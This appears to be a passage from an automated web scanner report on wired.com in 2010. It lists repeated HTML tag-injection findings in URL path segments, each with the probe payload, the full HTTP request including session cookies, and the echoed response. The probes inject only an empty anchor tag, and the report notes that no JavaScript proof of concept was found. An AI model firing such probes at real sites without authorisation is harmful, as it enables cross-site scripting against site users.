This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriese4d3a"><a>ccd81216dac/news/2007/09/dayintech_0903 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:20 GMT
Date: Sun, 21 Nov 2010 23:11:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriese4d3a"><a>ccd81216dac c_news">
...[SNIP]...

1.243. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0903 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/09/dayintech_0903

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f786"><a>0483485da03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news1f786"><a>0483485da03/2007/09/dayintech_0903 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:29 GMT
Date: Sun, 21 Nov 2010 23:11:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news1f786"><a>0483485da03">
...[SNIP]...

1.244. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0904 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/09/dayintech_0904

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ac5"><a>19e070cbea0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceb4ac5"><a>19e070cbea0/discoveries/news/2007/09/dayintech_0904 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:06 GMT
Date: Sun, 21 Nov 2010 23:11:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceb4ac5"><a>19e070cbea0 ss_discoveries c_news">
...[SNIP]...

1.245. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0904 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/09/dayintech_0904

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9c23"><a>3309dc6b8b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesa9c23"><a>3309dc6b8b4/news/2007/09/dayintech_0904 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:22 GMT
Date: Sun, 21 Nov 2010 23:11:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesa9c23"><a>3309dc6b8b4 c_news">
...[SNIP]...

1.246. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0904 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/09/dayintech_0904

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78e49"><a>d02b8d3e523 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news78e49"><a>d02b8d3e523/2007/09/dayintech_0904 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:32 GMT
Date: Sun, 21 Nov 2010 23:11:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news78e49"><a>d02b8d3e523">
...[SNIP]...

1.247. http://www.wired.com/science/discoveries/news/2007/10/dayintech_1010 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/10/dayintech_1010

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1916e"><a>0a35d8b532a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science1916e"><a>0a35d8b532a/discoveries/news/2007/10/dayintech_1010 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:38 GMT
Date: Sun, 21 Nov 2010 23:09:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science1916e"><a>0a35d8b532a ss_discoveries c_news">
...[SNIP]...

1.248. http://www.wired.com/science/discoveries/news/2007/10/dayintech_1010 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/10/dayintech_1010

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 884c7"><a>bb42abaa2dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries884c7"><a>bb42abaa2dc/news/2007/10/dayintech_1010 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:04 GMT
Date: Sun, 21 Nov 2010 23:10:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries884c7"><a>bb42abaa2dc c_news">
...[SNIP]...

1.249. http://www.wired.com/science/discoveries/news/2007/10/dayintech_1010 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/10/dayintech_1010

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf412"><a>cb3677366bf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newscf412"><a>cb3677366bf/2007/10/dayintech_1010 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:24 GMT
Date: Sun, 21 Nov 2010 23:10:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newscf412"><a>cb3677366bf">
...[SNIP]...

1.250. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1105 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1105

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aa58"><a>4fd1e10ab82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science1aa58"><a>4fd1e10ab82/discoveries/news/2007/11/dayintech_1105 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:34 GMT
Date: Sun, 21 Nov 2010 23:09:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science1aa58"><a>4fd1e10ab82 ss_discoveries c_news">
...[SNIP]...

1.251. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1105 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1105

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e2b"><a>c26500463e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries68e2b"><a>c26500463e9/news/2007/11/dayintech_1105 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:00 GMT
Date: Sun, 21 Nov 2010 23:10:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries68e2b"><a>c26500463e9 c_news">
...[SNIP]...

1.252. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1105 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1105

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 106cc"><a>40e21ea45df was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news106cc"><a>40e21ea45df/2007/11/dayintech_1105 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:21 GMT
Date: Sun, 21 Nov 2010 23:10:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news106cc"><a>40e21ea45df">
...[SNIP]...

1.253. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1112 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1112

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b3f5"><a>0ed0fcf84fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science2b3f5"><a>0ed0fcf84fd/discoveries/news/2007/11/dayintech_1112 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:30 GMT
Date: Sun, 21 Nov 2010 23:09:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science2b3f5"><a>0ed0fcf84fd ss_discoveries c_news">
...[SNIP]...

1.254. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1112 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1112

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad12b"><a>fc633443f33 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesad12b"><a>fc633443f33/news/2007/11/dayintech_1112 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:53 GMT
Date: Sun, 21 Nov 2010 23:09:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesad12b"><a>fc633443f33 c_news">
...[SNIP]...

1.255. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1112 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1112

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 483e8"><a>03a3277457 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news483e8"><a>03a3277457/2007/11/dayintech_1112 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:11 GMT
Date: Sun, 21 Nov 2010 23:10:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news483e8"><a>03a3277457">
...[SNIP]...

1.256. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1119 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1119

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdf3d"><a>d84d2d33c95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencecdf3d"><a>d84d2d33c95/discoveries/news/2007/11/dayintech_1119 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:26 GMT
Date: Sun, 21 Nov 2010 23:09:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencecdf3d"><a>d84d2d33c95 ss_discoveries c_news">
...[SNIP]...

1.257. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1119 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1119

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5c14"><a>76302bf60a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriese5c14"><a>76302bf60a4/news/2007/11/dayintech_1119 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
